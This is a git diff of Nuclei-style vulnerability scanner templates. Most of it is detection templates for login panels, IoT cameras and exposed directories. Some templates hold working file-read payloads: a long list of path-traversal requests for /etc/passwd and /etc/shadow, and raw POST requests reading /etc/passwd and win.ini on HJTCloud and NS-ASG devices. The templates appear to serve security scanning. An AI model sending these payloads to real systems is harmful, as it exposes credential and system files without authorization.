tls11 - extractors: - type: json json: - " .tls_version" -# digest: 490a0046304402202676887fb2bb19b250a3d7242fa4f8b227f1e7fcc213d0c25ef756dbb2b49b0102205ff811bcca37e12032ae5f53deb8d452b229b2fc3b165021a637a8de66f38641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/dir-listing-7009.yaml b/poc/other/dir-listing-7009.yaml index 3f886b9869..5192b48644 100644 --- a/poc/other/dir-listing-7009.yaml +++ b/poc/other/dir-listing-7009.yaml @@ -3,7 +3,8 @@ info: name: Directory listing enabled author: _harleo,pentest_swissky severity: info - reference: https://portswigger.net/kb/issues/00600100_directory-listing + reference: + - https://portswigger.net/kb/issues/00600100_directory-listing tags: misc,generic requests: - method: GET @@ -16,3 +17,4 @@ requests: - "Index of /" - "[To Parent Directory]" - "Directory: /" + condition: or diff --git a/poc/other/domcfg-page-7075.yaml b/poc/other/domcfg-page-7075.yaml index 1d9bad7a50..7de3df05fe 100644 --- a/poc/other/domcfg-page-7075.yaml +++ b/poc/other/domcfg-page-7075.yaml @@ -4,13 +4,11 @@ info: author: gevakun severity: low reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824 - tags: exposure - + tags: exposure,lotus requests: - method: GET path: - "{{BaseURL}}/domcfg.nsf" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - Mapping - Mappings condition: and - - type: status status: - 200 diff --git a/poc/other/easy-media-gallery-pro-listing.yaml b/poc/other/easy-media-gallery-pro-listing.yaml index e3b005d465..4472ac4d94 100644 --- a/poc/other/easy-media-gallery-pro-listing.yaml +++ b/poc/other/easy-media-gallery-pro-listing.yaml @@ -1,24 +1,24 @@ -id: easy-media-gallery-pro-listing -info: - name: WordPress Plugin Media Gallery Pro Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6455 - tags: wordpress,listing,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/easy-media-gallery-pro/" - condition: and - - type: status - status: - - 200 +id: easy-media-gallery-pro-listing +info: + name: WordPress Plugin Media Gallery Pro Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6455 + tags: wordpress,listing,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/easy-media-gallery-pro/" + condition: and + - type: status + status: + - 200 diff --git a/poc/other/fatpipe-ipvpn-panel-7436.yaml b/poc/other/fatpipe-ipvpn-panel-7436.yaml index 80aafdc1c8..e66d5b095c 100644 --- a/poc/other/fatpipe-ipvpn-panel-7436.yaml +++ b/poc/other/fatpipe-ipvpn-panel-7436.yaml @@ -4,7 +4,8 @@ info: name: FatPipe IPVPN® Panel Detect author: dwisiswant0 severity: info - reference: https://www.fatpipeinc.com/products/index.php + reference: + - https://www.fatpipeinc.com/products/index.php tags: panel,ipvpn,fatpipe requests: diff --git a/poc/other/filezilla.yaml b/poc/other/filezilla.yaml index fdfeca477f..433093831e 100644 --- a/poc/other/filezilla.yaml +++ b/poc/other/filezilla.yaml @@ -1,4 +1,5 @@ id: filezilla-exposed + info: name: Filezilla author: amsda @@ -9,6 +10,7 @@ requests: - "{{BaseURL}}/filezilla.xml" - "{{BaseURL}}/sitemanager.xml" - "{{BaseURL}}/FileZilla.xml" + matchers-condition: and matchers: - type: word @@ -16,10 +18,12 @@ requests: - "" condition: and + - type: word words: - xml part: header + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/firebase-urls.yaml b/poc/other/firebase-urls.yaml index 18f0ab9edd..67a05cefcb 100644 --- a/poc/other/firebase-urls.yaml +++ b/poc/other/firebase-urls.yaml @@ -20,4 +20,4 @@ requests: - type: regex regex: - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?" - part: body + part: body \ No newline at end of file diff --git a/poc/other/hjtcloud-arbitrary-file-read.yaml b/poc/other/hjtcloud-arbitrary-file-read.yaml index 89620cd0e4..a4301b8ce5 100644 --- a/poc/other/hjtcloud-arbitrary-file-read.yaml +++ b/poc/other/hjtcloud-arbitrary-file-read.yaml @@ -13,9 +13,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/etc/passwd @@ -23,9 +21,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/Windows/win.ini diff --git a/poc/other/home-assistant-7981.yaml b/poc/other/home-assistant-7981.yaml index 0522fc067b..dfb82e44b7 100644 --- a/poc/other/home-assistant-7981.yaml +++ b/poc/other/home-assistant-7981.yaml @@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/poc/other/hp-service-manager-8032.yaml b/poc/other/hp-service-manager-8032.yaml index d4450e4ee9..8751e2e49a 100644 --- a/poc/other/hp-service-manager-8032.yaml +++ b/poc/other/hp-service-manager-8032.yaml @@ -1,19 +1,16 @@ id: hp-service-manager - info: name: HP Service Manager author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"HP Service Manager" + reference: + - https://www.shodan.io/search?query=http.title%3A%22HP+Service+Manager%22 tags: panel,hp,service - requests: - method: GET path: - '{{BaseURL}}/sm935/index.do' - '{{BaseURL}}/sm/ess.do' - matchers-condition: and matchers: - type: regex diff --git a/poc/other/huawei-hg532e-panel.yaml b/poc/other/huawei-hg532e-panel.yaml index 09871c83a9..8f1cc09e5e 100644 --- a/poc/other/huawei-hg532e-panel.yaml +++ b/poc/other/huawei-hg532e-panel.yaml @@ -1,30 +1,25 @@ id: huawei-hg532e-panel - info: name: Huawei HG532e Detection author: idealphase severity: info description: The Huawei HG532e router. By default, both the username and password is user + metadata: + shodan-query: http.html:"HG532e" reference: - https://setuprouter.com/router/huawei/hg532e/1194.pdf - https://www.192-168-1-1-ip.co/router/huawei/hg532e/2186/ - metadata: - shodan-query: http.html:"HG532e" tags: huawei,panel - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - - type: word part: body words: - "HG532e" - - type: status status: - 200 diff --git a/poc/other/internet-service.yaml b/poc/other/internet-service.yaml index 25a97192ed..d058c13c85 100644 --- a/poc/other/internet-service.yaml +++ b/poc/other/internet-service.yaml @@ -1,17 +1,15 @@ id: internet-service - info: name: Internet Services author: dhiyaneshDK severity: low - reference: https://www.exploit-db.com/ghdb/5948 + reference: + - https://www.exploit-db.com/ghdb/5948 tags: iot - requests: - method: GET path: - '{{BaseURL}}/default.htm' - matchers-condition: and matchers: - type: word diff --git a/poc/other/ioncube-loader-wizard.yaml b/poc/other/ioncube-loader-wizard.yaml index 399454a616..e5f2981ba0 100644 --- a/poc/other/ioncube-loader-wizard.yaml +++ b/poc/other/ioncube-loader-wizard.yaml @@ -1,15 +1,10 @@ id: ioncube-loader-wizard info: - name: ioncube Loader Wizard Disclosure + name: Ioncube Loader Wizard disclosure author: Mubassirpatel severity: medium - description: An ioncube Loader Wizard was discovered. - reference: - - https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 + description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc. + reference: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/ tags: ioncube,disclosure,exposure requests: - method: GET @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/08 diff --git a/poc/other/itop-panel.yaml b/poc/other/itop-panel.yaml index 66bf2e2b5a..367b274f54 100644 --- a/poc/other/itop-panel.yaml +++ b/poc/other/itop-panel.yaml @@ -1,15 +1,18 @@ id: itop-panel + info: name: iTop Instance Detection Template author: righettod severity: info description: Try to detect the presence of a Combodo iTop instance via the login page tags: panel,itop + requests: - method: GET path: - "{{BaseURL}}/pages/UI.php" - "{{BaseURL}}/simple/pages/UI.php" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - "iTop login" part: body condition: or + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/jenk.yaml b/poc/other/jenk.yaml index 1ce87d12b2..62a1aba442 100644 --- a/poc/other/jenk.yaml +++ b/poc/other/jenk.yaml @@ -53,4 +53,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/jkstatus-manager.yaml b/poc/other/jkstatus-manager.yaml index 8b01538324..06deaae295 100644 --- a/poc/other/jkstatus-manager.yaml +++ b/poc/other/jkstatus-manager.yaml @@ -2,9 +2,8 @@ id: jkstatus-manager info: name: JK Status Manager - author: pdteam + author: bauthard severity: low - tags: config requests: - method: GET diff --git a/poc/other/jmx-console-8351.yaml b/poc/other/jmx-console-8351.yaml index 81893c03f8..d42d8c1648 100644 --- a/poc/other/jmx-console-8351.yaml +++ b/poc/other/jmx-console-8351.yaml @@ -1,9 +1,9 @@ id: jmx-console info: name: JMX Console - author: yashanand155 + author: Yash Anand @yashanand155 severity: low - tags: panel,jmx + tags: panel requests: - method: GET diff --git a/poc/other/jolokia.yaml b/poc/other/jolokia.yaml index 5864d45b30..847ba584d9 100644 --- a/poc/other/jolokia.yaml +++ b/poc/other/jolokia.yaml @@ -1,15 +1,13 @@ id: jolokia-instance - info: name: Jolokia Version Disclosure - author: mavericknerd & dwisiswant0 - severity: low - + author: mavericknerd,dwisiswant0 + severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' - - '{{BaseURL}}:8080/jolokia/version' matchers-condition: and matchers: - type: word diff --git a/poc/other/landray-oa-fileread-8569.yaml b/poc/other/landray-oa-fileread-8569.yaml old mode 100755 new mode 100644 diff --git a/poc/other/lazy-file-8607.yaml b/poc/other/lazy-file-8607.yaml index 86c95e88c3..15bca2c8c7 100644 --- a/poc/other/lazy-file-8607.yaml +++ b/poc/other/lazy-file-8607.yaml @@ -1,17 +1,26 @@ id: lazy-file-manager + info: name: Lazy File Manager author: amsda severity: medium -requests: + description: lfm.php file in exposed in Lazy File Manager. + metadata: + max-request: 1 + tags: exposure + +http: - method: GET path: - "{{BaseURL}}/lfm.php" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - Lazy File Manager +# digest: 4b0a00483046022100b54a4c899dd57c9e24da25ed4b5d8a4e57da0c55d202912808bf996cf590ef2f022100be48666d3f536cda624ca329e04edfe66e3606e351a5d1d88eb047bb6c91e4ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/liveview-axis-camera.yaml b/poc/other/liveview-axis-camera.yaml index e7342904ad..2f1e20973e 100644 --- a/poc/other/liveview-axis-camera.yaml +++ b/poc/other/liveview-axis-camera.yaml @@ -1,19 +1,23 @@ id: liveview-axis-camera info: - name: Live view AXIS Network Camera + name: Live View AXIS Network Camera author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6843 - tags: iot + tags: iot,axis,network requests: - method: GET path: - '{{BaseURL}}/view/viewer_index.shtml' - matchers-condition: and + matchers-condition: or matchers: - - type: word - words: - - 'Live view - AXIS' - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(tolower(body), "live view - axis")' + condition: and + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(tolower(body), "/incl/axis_connection.js")' + condition: and diff --git a/poc/other/local-file-inclusion.yaml b/poc/other/local-file-inclusion.yaml index 1fd7854389..09b46ce63d 100644 --- a/poc/other/local-file-inclusion.yaml +++ b/poc/other/local-file-inclusion.yaml @@ -1,70 +1,67 @@ + id: LFI info: name: Local File Inclusion - author: 0x71rex + author: pikpikcu severity: high requests: - method: GET path: - - '{{BaseURL}}/etc/shells' + - '{{BaseURL}}/etc/passwd' - '{{BaseURL}}/etc/shadow%00' - - '{{BaseURL}}/etc/shells' - - '{{BaseURL}}/etc/shells%00' - - '{{BaseURL}}../etc/shells' - - '{{BaseURL}}../etc/shells%00' - - '{{BaseURL}}../../etc/shells' - - '{{BaseURL}}../../etc/shells%00' - - '{{BaseURL}}../../../etc/shells' - - '{{BaseURL}}../../../etc/shells%00' - - '{{BaseURL}}../../../../etc/shells' - - '{{BaseURL}}../../../../etc/shells%00' - - '{{BaseURL}}../../../../../etc/shells' - - '{{BaseURL}}../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/shells%00' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shells' - - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shells%00' + - '{{BaseURL}}/etc/passwd' + - '{{BaseURL}}/etc/passwd%00' + - '{{BaseURL}}../etc/passwd' + - '{{BaseURL}}../etc/passwd%00' + - '{{BaseURL}}../../etc/passwd' + - '{{BaseURL}}../../etc/passwd%00' + - '{{BaseURL}}../../../etc/passwd' + - '{{BaseURL}}../../../etc/passwd%00' + - '{{BaseURL}}../../../../etc/passwd' + - '{{BaseURL}}../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../etc/passwd' + - '{{BaseURL}}../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00' - - '{{BaseURL}}../../../../../../etc/shells&=%3C%3C%3C%3C' + - '{{BaseURL}}../../../../../../etc/passwd&=%3C%3C%3C%3C' matchers: - - type: word - words: - - "# valid login shells" - - "/bin/sh" - - "/bin/ash" - - "/bin/bash" - condition: and + - type: regex + regex: + - "root:[x*]:0:0:" part: body diff --git a/poc/other/manageengine-adaudit-8729.yaml b/poc/other/manageengine-adaudit-8729.yaml index 377dd9e8d5..e2de7755dd 100644 --- a/poc/other/manageengine-adaudit-8729.yaml +++ b/poc/other/manageengine-adaudit-8729.yaml @@ -1,21 +1,24 @@ id: manageengine-adaudit + info: name: ZOHO ManageEngine ADAudit/ADManager Panel author: dhiyaneshDK,PR3R00T severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}' - "{{BaseURL}}/authorization.do" + matchers-condition: and matchers: - type: word words: - 'ManageEngine - ADManager Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/manageengine-adselfservice-8737.yaml b/poc/other/manageengine-adselfservice-8737.yaml index 7362411b83..6532736e50 100644 --- a/poc/other/manageengine-adselfservice-8737.yaml +++ b/poc/other/manageengine-adselfservice-8737.yaml @@ -1,23 +1,20 @@ id: manageengine-adselfservice - info: name: ZOHO ManageEngine ADSelfService Plus author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 tags: panel,zoho,manageengine - requests: - method: GET path: - '{{BaseURL}}/authorization.do' - matchers-condition: and matchers: - type: word words: - 'ADSelfService Plus' - - type: status status: - 200 diff --git a/poc/other/manageengine-analytics.yaml b/poc/other/manageengine-analytics.yaml index 88eba95c38..913172962a 100644 --- a/poc/other/manageengine-analytics.yaml +++ b/poc/other/manageengine-analytics.yaml @@ -1,20 +1,24 @@ id: manageengine-analytics + info: name: ZOHO ManageEngine Analytics Plus author: dhiyaneshDK severity: info - reference: - - https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D + metadata: + fofa-query: app="ZOHO-流量管理" tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}/iam/login' + matchers-condition: and matchers: - type: word words: - 'ManageEngine Analytics Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/manageengine-assetexplorer-8757.yaml b/poc/other/manageengine-assetexplorer-8757.yaml index 5624722829..04adb8708c 100644 --- a/poc/other/manageengine-assetexplorer-8757.yaml +++ b/poc/other/manageengine-assetexplorer-8757.yaml @@ -3,8 +3,7 @@ info: name: ZOHO ManageEngine AssetExplorer author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 tags: panel,zoho,manageengine requests: - method: GET diff --git a/poc/other/manageengine-desktop-8762.yaml b/poc/other/manageengine-desktop-8762.yaml index 503b3dc94e..310ef954d9 100644 --- a/poc/other/manageengine-desktop-8762.yaml +++ b/poc/other/manageengine-desktop-8762.yaml @@ -1,20 +1,23 @@ id: manageengine-desktop + info: name: ZOHO ManageEngine Desktop author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}/configurations' + matchers-condition: and matchers: - type: word words: - 'ManageEngine Desktop Central 10' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/mautic-crm-panel.yaml b/poc/other/mautic-crm-panel.yaml index 8efd21e520..2671f8dff5 100644 --- a/poc/other/mautic-crm-panel.yaml +++ b/poc/other/mautic-crm-panel.yaml @@ -1,15 +1,20 @@ id: mautic-crm-panel + info: name: Mautic CRM Panel Login author: cyllective,daffainfo severity: info - description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, questionnaires, reports, etc. - reference: https://github.com/mautic/mautic + description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, + questionnaires, reports, etc. + reference: + - https://github.com/mautic/mautic tags: tech,mautic,crm + requests: - method: GET path: - "{{BaseURL}}/s/login" + matchers-condition: and matchers: - type: word @@ -18,6 +23,7 @@ requests: - 'Mautic' - 'var mauticBasePath' condition: and + - type: status status: - 200 diff --git a/poc/other/metabase-panel.yaml b/poc/other/metabase-panel.yaml index b06f3bb0a0..a897496550 100644 --- a/poc/other/metabase-panel.yaml +++ b/poc/other/metabase-panel.yaml @@ -1,25 +1,21 @@ id: metabase-panel - info: name: Metabase Login Panel author: revblock,daffainfo - severity: info description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source metadata: shodan-query: http.title:"Metabase" + severity: info tags: panel,metabase,login - requests: - method: GET path: - "{{BaseURL}}/auth/login" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: @@ -27,7 +23,6 @@ requests: - "window.MetabaseBootstrap" - "window.MetabaseRoot" condition: and - extractors: - type: regex part: body diff --git a/poc/other/mikrotik-routeros.yaml b/poc/other/mikrotik-routeros.yaml index 878d13146a..93481765df 100644 --- a/poc/other/mikrotik-routeros.yaml +++ b/poc/other/mikrotik-routeros.yaml @@ -1,15 +1,17 @@ id: mikrotik-routeros + info: name: MikroTik RouterOS Login author: gy741 severity: info - reference: - - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe + reference: https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe tags: panel,login + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word diff --git a/poc/other/mobotix-guest-camera-8911.yaml b/poc/other/mobotix-guest-camera-8911.yaml index 67f209bbb0..c1948d9506 100644 --- a/poc/other/mobotix-guest-camera-8911.yaml +++ b/poc/other/mobotix-guest-camera-8911.yaml @@ -1,11 +1,12 @@ id: mobotix-guest-camera + info: name: MOBOTIX Guest Camera author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6848 + reference: https://www.exploit-db.com/ghdb/6848 tags: iot + requests: - method: GET path: diff --git a/poc/other/netscaler-gateway-9052.yaml b/poc/other/netscaler-gateway-9052.yaml index 0f006101d3..a627e50ace 100644 --- a/poc/other/netscaler-gateway-9052.yaml +++ b/poc/other/netscaler-gateway-9052.yaml @@ -1,10 +1,15 @@ id: netscaler-gateway - info: - name: Netscaler gateway + name: Netscaler Gateway author: joeldeleep severity: info - + description: Citrix NetScaler is an application delivery controller that improves the delivery speed and quality of applications to an end user. + reference: + - https://stack.watch/product/citrix/netscaler-gateway/ + classification: + cwe-id: CWE-200 + remediation: Ensure proper access. + tags: panel,netscaler requests: - method: GET path: @@ -13,3 +18,5 @@ requests: - type: word words: - Netscaler Gateway + +# Enhanced by mp on 2022/02/09 diff --git a/poc/other/nextcloud-install-9085.yaml b/poc/other/nextcloud-install-9085.yaml index cfdb474024..470fee01e3 100644 --- a/poc/other/nextcloud-install-9085.yaml +++ b/poc/other/nextcloud-install-9085.yaml @@ -1,4 +1,5 @@ id: nextcloud-install + info: name: Nextcloud Exposed Installation author: skeltavik @@ -6,11 +7,15 @@ info: reference: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html tags: tech,nextcloud,storage -requests: + metadata: + max-request: 1 + +http: - method: GET path: - '{{BaseURL}}' - redirects: true + + host-redirects: true max-redirects: 2 matchers-condition: and matchers: @@ -20,6 +25,7 @@ requests: - '
Create an admin account' - 'Storage & database' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/ns-asg-file-read-9151.yaml b/poc/other/ns-asg-file-read-9151.yaml index b7b4daf1b7..e071092773 100644 --- a/poc/other/ns-asg-file-read-9151.yaml +++ b/poc/other/ns-asg-file-read-9151.yaml @@ -1,36 +1,18 @@ id: nsasg-arbitrary-file-read info: - name: NS ASG - Local File Inclusion - author: pikpikcu,ritikchaddha + name: NS ASG Arbitrary File Read + author: pikpikcu severity: high - description: NS ASG is vulnerable to local file inclusion. - reference: - - https://zhuanlan.zhihu.com/p/368054963 - - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md - metadata: - fofa-query: app="网康科技-NS-ASG安全网关" - shodan-query: http.title:“NS-ASG” - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: nsasg,lfi requests: - method: GET path: - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" - - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" - - type: word - part: body - words: - - "$certfile" - - "application/pdf" - condition: and - -# Enhanced by mp on 2022/08/03 + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/other/ntlm-directories-9155.yaml b/poc/other/ntlm-directories-9155.yaml index 839d67428e..c84e9f1e62 100644 --- a/poc/other/ntlm-directories-9155.yaml +++ b/poc/other/ntlm-directories-9155.yaml @@ -1,68 +1,75 @@ id: ntlm-directories - info: name: Discovering directories w/ NTLM - author: puzzlepeaches + author: puzzlepeaches,incogbyte severity: info - tags: misc - + reference: + - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 + tags: misc,fuzz,windows requests: - - method: GET - path: - - "{{BaseURL}}/abs/" - - "{{BaseURL}}/adfs/services/trust/2005/windowstransport" - - "{{BaseURL}}/aspnet_client/" - - "{{BaseURL}}/autodiscover/" - - "{{BaseURL}}/autoupdate/" - - "{{BaseURL}}/certenroll/" - - "{{BaseURL}}/certprov/" - - "{{BaseURL}}/certsrv/" - - "{{BaseURL}}/conf/" - - "{{BaseURL}}/deviceupdatefiles_ext/" - - "{{BaseURL}}/deviceupdatefiles_int/" - - "{{BaseURL}}/dialin/" - - "{{BaseURL}}/ecp/" - - "{{BaseURL}}/etc/" - - "{{BaseURL}}/ews/" - - "{{BaseURL}}/exchange/" - - "{{BaseURL}}/exchweb/" - - "{{BaseURL}}/groupexpansion/" - - "{{BaseURL}}/hybridconfig/" - - 